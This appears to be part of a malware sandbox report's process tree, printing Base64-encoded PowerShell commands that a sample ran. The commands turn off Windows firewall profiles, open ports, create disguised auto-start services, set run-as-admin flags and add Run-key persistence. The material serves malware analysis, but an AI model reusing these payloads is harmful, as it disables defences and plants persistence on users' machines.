HUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAG0AeQBzAHQALgBlAHgAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAG0AeQBzAHQALgBlAHgAZQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwALgBtAHkAcwB0AGUAcgBpAHUAbQAtAGIAaQBuAFwAbQB5AHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAFAAdQBiAGwAaQBjACAALQBQAHIAbwB0AG8AYwBvAGwAIABVAEQAUAAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBOAGUAdAB3AG8AcgBrACAARABpAHMAYwBvAHYAZQByAHkAIABTAGUAcgB2AGkAYwBlACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIATgBlAHQAdwBvAHIAawAgAEQAaQBzAGMAbwB2AGUAcgB5ACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAE4AZQB0AHcAbwByAGsAIABEAGkAcwBjAG8AdgBlAHIAeQAgAFMAZQByAHYAaQBjAGUAIgAgAC0ATABvAGMAYQBsAFAAbwByAHQAIAA4ADAALAAgADQANAAzACwAIAAyADAAMgAwACwAIAAyADQAMAA0ACwAIAAzADMAMwAzACwAIAA0ADQANAA0ACwAIAA1ADUANQA1ACwAIAA0ADQANAA5ACwAIAA0ADAANQAwACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AUAByAG8AdABvAGMAbwBsACAAVABDAFAAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAE4AZQB0AHcAbwByAGsAIABEAGkAcwBjAG8AdgBlAHIAeQAgAEMAbwBuAHQAcgBvAGwAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBOAGUAdAB3AG8AcgBrACAARABpAHMAYwBvAHYAZQByAHkAIABDAG8AbgB0AHIAbwBsACIAIAAtAEcAcgBvAHUAcAAgACIATgBlAHQAdwBvAHIAawAgAEQAaQBzAGMAbwB2AGUAcgB5ACAAQwBvAG4AdAByAG8AbAAiACAALQBMAG8AYwBhAGwAUABvAHIAdAAgADgAMAAsACAANAA0ADMALAAgADIAMAAyADAALAAgADIANAAwADQALAAgADMAMwAzADMALAAgADQANAA0ADQALAAgADUANQA1ADUALAAgADQANAA0ADkALAAgADQAMAA1ADAAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAFAAcgBvAHQAbwBjAG8AbAAgAFQAQwBQACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgAKAFMAZQB0AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFAAcgBvAGYAaQBsAGUAIAAtAFAAcgBvAGYAaQBsAGUAIABEAG8AbQBhAGkAbgAsAFAAdQBiAGwAaQBjACwAUAByAGkAdgBhAHQAZQAgAC0ARQBuAGEAYgBsAGUAZAAgAEYAYQBsAHMAZQAKAA==
        6⤵
        
        PID:4592
        
        C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 65001
        7⤵
        
        PID:7000
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKACQAcwBlAHIAdgBpAGMAZQBzACAAPQAgAEAAKAAKACAAIAAgACAAQAB7AE4AYQBtAGUAPQAiAFAAcgBvAGcAcgBhAG0AcwBDAGEAYwBoAGUAIgA7ACAARABpAHMAcABsAGEAeQBOAGEAbQBlAD0AIgBDAGEAYwBoAGUAIABQAHIAbwBnAHIAYQBtACAAQwBvAG4AdAByAG8AbAAiADsAIABEAGUAcwBjAHIAaQBwAHQAaQBvAG4APQAiAE0AYQBuAGEAZwBlAHMAIABhAG4AZAAgAGkAbQBwAGwAZQBtAGUAbgB0AHMAIABDAGEAYwBoAGUAIABQAHIAbwBnAHIAYQBtACAAQwBvAG4AdAByAG8AbAAgAHUAcwBlAGQAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIABvAHQAaABlAHIAIABwAHUAcgBwAG8AcwBlAHMALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAcwB0AG8AcABwAGUAZAAsACAAcwBoAGEAZABvAHcAIABjAG8AcABpAGUAcwAgAHcAaQBsAGwAIABiAGUAIAB1AG4AYQB2AGEAaQBsAGEAYgBsAGUAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIAB0AGgAZQAgAGIAYQBjAGsAdQBwACAAbQBhAHkAIABmAGEAaQBsAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAGQAaQBzAGEAYgBsAGUAZAAsACAAYQBuAHkAIABzAGUAcgB2AGkAYwBlAHMAIAB0AGgAYQB0ACAAZQB4AHAAbABpAGMAaQB0AGwAeQAgAGQAZQBwAGUAbgBkACAAbwBuACAAaQB0ACAAdwBpAGwAbAAgAGYAYQBpAGwAIAB0AG8AIABzAHQAYQByAHQALgAiADsAIABCAGkAbgBhAHIAeQBQAGEAdABoAE4AYQBtAGUAPQAiACQAZQBuAHYAOgBQAFIATwBHAFIAQQBNAEQAQQBUAEEAXABCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AE4AYQBtAGUAPQAiAFIAZQBnAGUAZABpAHQAQwBhAGMAaABlACIAOwAgAEQAaQBzAHAAbABhAHkATgBhAG0AZQA9ACIAUgBlAGcAaQBzAHQAcgB5ACAARQBkAGkAdABvAHIAIABDAGEAYwBoAGUAIABDAG8AbgB0AHIAbwBsACIAOwAgAEQAZQBzAGMAcgBpAHAAdABpAG8AbgA9ACIATQBhAG4AYQBnAGUAcwAgAGEAbgBkACAAaQBtAHAAbABlAG0AZQBuAHQAcwAgAEMAYQBjAGgAZQAgAFIAZQBnAGkAcwB0AHIAeQAgAFAAcgBvAGcAcgBhAG0AIABDAG8AbgB0AHIAbwBsACAAdQBzAGUAZAAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAG8AdABoAGUAcgAgAHAAdQByAHAAbwBzAGUAcwAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABzAHQAbwBwAHAAZQBkACwAIABzAGgAYQBkAG8AdwAgAGMAbwBwAGkAZQBzACAAdwBpAGwAbAAgAGIAZQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAHQAaABlACAAYgBhAGMAawB1AHAAIABtAGEAeQAgAGYAYQBpAGwALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAZABpAHMAYQBiAGwAZQBkACwAIABhAG4AeQAgAHMAZQByAHYAaQBjAGUAcwAgAHQAaABhAHQAIABlAHgAcABsAGkAYwBpAHQAbAB5ACAAZABlAHAAZQBuAGQAIABvAG4AIABpAHQAIAB3AGkAbABsACAAZgBhAGkAbAAgAHQAbwAgAHMAdABhAHIAdAAuACIAOwAgAEIAaQBuAGEAcgB5AFAAYQB0AGgATgBhAG0AZQA9ACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEUAbQBiAGUAZABpAHQALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AE4AYQBtAGUAPQAiAEQAZQB2AEEAcwBzAG8AYwBNAGEAbgAiADsAIABEAGkAcwBwAGwAYQB5AE4AYQBtAGUAPQAiAEQAZQB2AGkAYwBlACAAQQBzAHMAbwBjAGkAYQB0AGkAbwBuACAATQBhAG4AYQBnAGUAcgAiADsAIABEAGUAcwBjAHIAaQBwAHQAaQBvAG4APQAiAE0AYQBuAGEAZwBlAHMAIABhAG4AZAAgAGkAbQBwAGwAZQBtAGUAbgB0AHMAIABEAGUAdgBpAGMAZQAgAEEAcwBzAG8AYwBpAGEAdABpAG8AbgAgAE0AYQBuAGEAZwBlAHIAIAB1AHMAZQBkACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAbwB0AGgAZQByACAAcAB1AHIAcABvAHMAZQBzAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAHMAdABvAHAAcABlAGQALAAgAHMAaABhAGQAbwB3ACAAYwBvAHAAaQBlAHMAIAB3AGkAbABsACAAYgBlACAAdQBuAGEAdgBhAGkAbABhAGIAbABlACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAdABoAGUAIABiAGEAYwBrAHUAcAAgAG0AYQB5ACAAZgBhAGkAbAAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABkAGkAcwBhAGIAbABlAGQALAAgAGEAbgB5ACAAcwBlAHIAdgBpAGMAZQBzACAAdABoAGEAdAAgAGUAeABwAGwAaQBjAGkAdABsAHkAIABkAGUAcABlAG4AZAAgAG8AbgAgAGkAdAAgAHcAaQBsAGwAIABmAGEAaQBsACAAdABvACAAcwB0AGEAcgB0AC4AIgA7ACAAQgBpAG4AYQByAHkAUABhAHQAaABOAGEAbQBlAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgB9ACwACgAgACAAIAAgAEAAewBOAGEAbQBlAD0AIgBOAGcAYwBDAHAAbQByAFMAdgBjACIAOwAgAEQAaQBzAHAAbABhAHkATgBhAG0AZQA9ACIATQBpAGMAcgBvAHMAbwBmAHQAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABQAGEAcwBzAHAAbwByAHQAIgA7ACAARABlAHMAYwByAGkAcAB0AGkAbwBuAD0AIgBNAGEAbgBhAGcAZQBzACAAYQBuAGQAIABpAG0AcABsAGUAbQBlAG4AdABzACAATQBpAGMAcgBvAHMAbwBmAHQAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABQAGEAcwBzAHAAbwByAHQAIAB1AHMAZQBkACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAbwB0AGgAZQByACAAcAB1AHIAcABvAHMAZQBzAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAHMAdABvAHAAcABlAGQALAAgAHMAaABhAGQAbwB3ACAAYwBvAHAAaQBlAHMAIAB3AGkAbABsACAAYgBlACAAdQBuAGEAdgBhAGkAbABhAGIAbABlACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAdABoAGUAIABiAGEAYwBrAHUAcAAgAG0AYQB5ACAAZgBhAGkAbAAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABkAGkAcwBhAGIAbABlAGQALAAgAGEAbgB5ACAAcwBlAHIAdgBpAGMAZQBzACAAdABoAGEAdAAgAGUAeABwAGwAaQBjAGkAdABsAHkAIABkAGUAcABlAG4AZAAgAG8AbgAgAGkAdAAgAHcAaQBsAGwAIABmAGEAaQBsACAAdABvACAAcwB0AGEAcgB0AC4AIgA7ACAAQgBpAG4AYQByAHkAUABhAHQAaABOAGEAbQBlAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAfQAsAAoAIAAgACAAIABAAHsATgBhAG0AZQA9ACIAUgBlAG0AZQBkAHkAUAByAG8AYwAiADsAIABEAGkAcwBwAGwAYQB5AE4AYQBtAGUAPQAiAFIAZQBtAGUAZAB5ACAAUAByAG8AYwBlAHMAcwBlAHMAIgA7ACAARABlAHMAYwByAGkAcAB0AGkAbwBuAD0AIgBNAGEAbgBhAGcAZQBzACAAYQBuAGQAIABpAG0AcABsAGUAbQBlAG4AdABzACAAUgBlAG0AZQBkAHkAIABQAHIAbwBjAGUAcwBzAGUAcwAgAE0AYQBuAGEAZwBlAHIAIABDAG8AbgB0AHIAbwBsACAAdQBzAGUAZAAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAG8AdABoAGUAcgAgAHAAdQByAHAAbwBzAGUAcwAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABzAHQAbwBwAHAAZQBkACwAIABzAGgAYQBkAG8AdwAgAGMAbwBwAGkAZQBzACAAdwBpAGwAbAAgAGIAZQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAHQAaABlACAAYgBhAGMAawB1AHAAIABtAGEAeQAgAGYAYQBpAGwALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAZABpAHMAYQBiAGwAZQBkACwAIABhAG4AeQAgAHMAZQByAHYAaQBjAGUAcwAgAHQAaABhAHQAIABlAHgAcABsAGkAYwBpAHQAbAB5ACAAZABlAHAAZQBuAGQAIABvAG4AIABpAHQAIAB3AGkAbABsACAAZgBhAGkAbAAgAHQAbwAgAHMAdABhAHIAdAAuACIAOwAgAEIAaQBuAGEAcgB5AFAAYQB0AGgATgBhAG0AZQA9ACIAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBAFwAUwBoAGUASQBsAEUAeABwAGUAcgBpAGUAbgBjAGUASABvAHMAdAAuAGUAeABlACIAfQAKACkACgAKAGYAbwByAGUAYQBjAGgAIAAoACQAcwBlAHIAdgBpAGMAZQAgAGkAbgAgACQAcwBlAHIAdgBpAGMAZQBzACkAIAB7AAoAIAAgACAAIABOAGUAdwAtAFMAZQByAHYAaQBjAGUAIAAtAE4AYQBtAGUAIAAkAHMAZQByAHYAaQBjAGUALgBOAGEAbQBlACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAkAHMAZQByAHYAaQBjAGUALgBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAtAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAgACQAcwBlAHIAdgBpAGMAZQAuAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAgAC0AUwB0AGEAcgB0AHUAcABUAHkAcABlACAAIgBBAHUAdABvAG0AYQB0AGkAYwAiACAALQBCAGkAbgBhAHIAeQBQAGEAdABoAE4AYQBtAGUAIAAkAHMAZQByAHYAaQBjAGUALgBCAGkAbgBhAHIAeQBQAGEAdABoAE4AYQBtAGUACgB9AAoA
        6⤵
        
        PID:5364
        
        C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 65001
        7⤵
        
        PID:5664
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKACQAYQBwAHAAQwBvAG0AcABhAHQAUABhAHQAaABzACAAPQAgAEAAKAAKAAkAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAsAAoACQAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiACwACgAgACAAIAAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIALAAKACAAIAAgACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABkAEkAbABoAG8AcwB0AC4AZQB4AGUAIgAsAAoACQAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAGQAbABJAGgAbwBzAHQALgBlAHgAZQAiACwACgAgACAAIAAgACIAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAXABUAEUATQBQAFwAZABsAEkAaABvAHMAdAAuAGUAeABlACIALAAKAAkAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAZQBkAGkAdAAuAGUAeABlACIALAAKAAkAIgAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABTAGgAZQBJAGwARQB4AHAAZQByAGkAZQBuAGMAZQBIAG8AcwB0AC4AZQB4AGUAIgAKACkACgAKAGYAbwByAGUAYQBjAGgAIAAoACQAcABhAHQAaAAgAGkAbgAgACQAYQBwAHAAQwBvAG0AcABhAHQAUABhAHQAaABzACkAIAB7AAoAIAAgACAAIABOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAJABwAGEAdABoACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKACAAIAAgACAAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACQAcABhAHQAaAAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAEYAbwByAGMAZQAKACAAIAAgACAATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACQAcABhAHQAaAAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgAgACAAIAAgAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAkAHAAYQB0AGgAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBGAG8AcgBjAGUACgB9AAoA
        6⤵
        
        PID:2424
        
        C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 65001
        7⤵
        
        PID:5284
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKACQAcgB1AG4ARQBuAHQAcgBpAGUAcwAgAD0AIABAACgACgAgACAAIAAgAEAAewBOAGEAbQBlAD0AIgBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIAIgA7ACAAVgBhAGwAdQBlAD0AIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgB9ACwACgAgACAAIAAgAEAAewBOAGEAbQBlAD0AIgBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIAIgA7ACAAVgBhAGwAdQBlAD0AIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAZQBkAGkAdAAuAGUAeABlACIAfQAsAAoAIAAgACAAIABAAHsATgBhAG0AZQA9ACIARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIAIgA7ACAAVgBhAGwAdQBlAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgB9ACwACgAgACAAIAAgAEAAewBOAGEAbQBlAD0AIgBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQAIgA7ACAAVgBhAGwAdQBlAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAfQAsAAoAIAAgACAAIABAAHsATgBhAG0AZQA9ACIAUwBoAGUASQBsAEUAeABwAGUAcgBpAGUAbgBjAGUASABvAHMAdAAiADsAIABWAGEAbAB1AGUAPQAiACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQBcAFMAaABlAEkAbABFAHgAcABlAHIAaQBlAG4AYwBlAEgAbwBzAHQALgBlAHgAZQAiAH0ACgApAAoACgBmAG8AcgBlAGEAYwBoACAAKAAkAGUAbgB0AHIAeQAgAGkAbgAgACQAcgB1AG4ARQBuAHQAcgBpAGUAcwApACAAewAKACAAIAAgACAATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACQAZQBuAHQAcgB5AC4ATgBhAG0AZQAgAC0AVgBhAGwAdQBlACAAJABlAG4AdAByAHkALgBWAGEAbAB1AGUAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKACAAIAAgACAAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACQAZQBuAHQAcgB5AC4ATgBhAG0AZQAgAC0AVgBhAGwAdQBlACAAJABlAG4AdAByAHkALgBWAGEAbAB1AGUAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAIAAgACAAIABOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAJABlAG4AdAByAHkALgBOAGEAbQBlACAALQBWAGEAbAB1AGUAIAAkAGUAbgB0AHIAeQAuAFYAYQBsAHUAZQAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAIAAgACAAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAJABlAG4AdAByAHkALgBOAGEAbQBlACAALQBWAGEAbAB1AGUAIAAkAGUAbgB0AHIAeQAuAFYAYQBsAHUAZQAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgB9AAoA
        6⤵
        Adds Run key to start application
        
        PID:5940
        
        C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 65001
        7⤵
        
        PID:4004
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
